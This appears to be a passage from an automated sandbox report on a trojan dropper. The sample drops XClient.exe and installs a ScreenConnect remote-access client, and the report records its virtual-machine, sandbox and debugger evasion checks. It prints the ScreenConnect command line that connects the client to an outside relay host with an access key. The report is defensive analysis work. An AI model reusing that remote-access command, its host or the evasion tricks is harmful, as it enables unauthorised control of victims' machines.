                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: XClient.exe, 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, XClient.exe.0.drBinary or memory string: SBIEDLL.DLLK8NG5FNK7RJG9WWQDMGLI7XIQYRKTTTLX4APUIKJKSN20XMWIR6DJ1U9FBXGWSQMMF72VYAWRF88KKSJTUVU20Z25ADQR5LSYOWZCEA2ECH6DAOA9CK3KYR23RNBYTHVMXXJKNRMI3FIFFP4GDJ5PZNEKIPD0HGHIFEGWW8CVTMZ6YI98S0QAFB6SMAKOGKJBAZS5A2JIPP1OUDAJMEVESTMYHEINQQFFUQOKDOZ160GCVQF3VTW3MQG2H23GLRUVCP15ODAERK7HDL7LIMVISHVPFVHD6U54CNAM5VHPRLE4U2QK1JYAAZE5BXQMCM9GJUT4DXTNZCWETRTWZBPRKKJB14TCKVCFDN6WLESCLWTNTQKJMC9XU4MU5WWKNXW7CZB9NFUD2OUHB3KWENP0NF4DANDXWXT4HKCWJINVXGJLGHZNQFTGGKBBJOGXHAHWHECCT9RKCV4ZHMRYKHVAFVKUJUR5VZKUWZUIIROUSC1LBKAFJUGLWH7JTOBVJH7CWCP7V8607YQK6HR1FMIKKR2A8CNEL5L7ABP4PQDC4UFL6EIQ6JN5LI5EKKLZR6YSKOTWD3UNO5531IE8BNRRWHB019FBDKFINFO
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeMemory allocated: 3750000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeMemory allocated: 1B810000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 11A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeMemory allocated: 1950000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeMemory allocated: 1520000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeMemory allocated: 1B170000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeMemory allocated: D20000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeMemory allocated: 1A760000 memory reserve | memory write watch
                        Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B212FB8 rdtsc 16_2_00007FF88B212FB8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI475F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI49E0.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe TID: 6568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe TID: 7264Thread sleep count: 100 > 30Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                        Source: C:\Users\user\AppData\Roaming\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                        Source: Amcache.hve.14.drBinary or memory string: VMware
                        Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                        Source: svchost.exe, 00000012.00000002.2474464713.000001BDD8A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                        Source: svchost.exe, 00000011.00000002.2474584572.000002B5604EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: svchost.exe, 00000012.00000002.2474464713.000001BDD8A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: svchost.exe, 00000012.00000002.2474464713.000001BDD8A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: svchost.exe, 00000012.00000002.2474464713.000001BDD8A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                        Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: XClient.exe, 00000002.00000002.1337235424.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.2491792514.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                        Source: svchost.exe, 00000012.00000002.2474464713.000001BDD8A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: svchost.exe, 00000012.00000002.2474559142.000001BDD8A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:8
                        Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                        Source: svchost.exe, 00000012.00000002.2474134463.000001BDD8A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: XClient.exe.0.drBinary or memory string: vmware
                        Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: svchost.exe, 00000012.00000002.2474134463.000001BDD8A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1240805098.0000000001ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                        Source: svchost.exe, 00000011.00000002.2474169075.000002B56042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                        Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: svchost.exe, 00000012.00000002.2473825293.000001BDD8A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                        Source: svchost.exe, 00000012.00000002.2474559142.000001BDD8A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
                        Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B207BE1 CheckRemoteDebuggerPresent,2_2_00007FF88B207BE1
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B212FB8 rdtsc 16_2_00007FF88B212FB8
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: ScreenConnect.ClientService.dll.4.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi" Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (37ec872757ed9eb0)\screenconnect.clientservice.exe" "?e=access&y=guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=bgiaaackaabsu0exaagaaaeaaqddnhauhg9aaqnead41l5c3tlcogt7wuxjecmodn7o3gdl7bk4onznyrievt6ejqjmy0i72foubua3sro67lzxqsv7jfpgdgjnglth6df16cg3uqgiklyyl5a5i9k7p1tib2s0rhiluxpx2wtkq8ui0x1arjnfkgdtb3cz5m3g7vqkiw1q%2f3qx4c1o5ag%2ffiid2sxvaashytbqd%2fxiikb9i8rftwmlulrabv5wej55xklm%2fttdu5vytjvwapn9vnhfqooubjj6q7dljfjlpykljoudyv6nlren8sdhapr%2fbzvm1m086ksyd3txkwahjga%2fsttqvuvvjalua63jah6j4&c=xowrm&c=xowrm&c=xowrm&c=xowrm&c=&c=&c=&c="
